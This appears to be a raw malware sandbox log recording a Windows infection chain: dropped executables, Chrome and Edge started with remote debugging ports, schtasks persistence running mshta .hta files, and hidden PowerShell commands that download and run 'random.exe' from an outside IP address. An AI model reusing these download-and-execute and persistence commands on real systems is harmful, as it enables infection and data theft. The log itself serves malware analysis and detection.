Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe "C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe"
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe"
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Process created: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe "C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe "C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe"
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2156,i,114299149771300209,1457107996023773148,262144 /prefetch:8
Source: unknown | Process created: C:\ProgramData\jnxnee\benskvi.exe C:\ProgramData\jnxnee\benskvi.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe"
Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2228,i,8936571210459543028,10198378582791773127,262144 /prefetch:3
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2136,i,8097992319961427004,17557995905178344852,262144 /prefetch:3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\plDCQRtK9.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\plDCQRtK9.hta"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe "C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe"
Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeProcess created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeProcess created: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe "C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2156,i,114299149771300209,1457107996023773148,262144 /prefetch:8
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2228,i,8936571210459543028,10198378582791773127,262144 /prefetch:3
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2136,i,8097992319961427004,17557995905178344852,262144 /prefetch:3
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\plDCQRtK9.hta"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                                Source: C:\Windows\System32\mshta.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeProcess created: unknown unknown
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
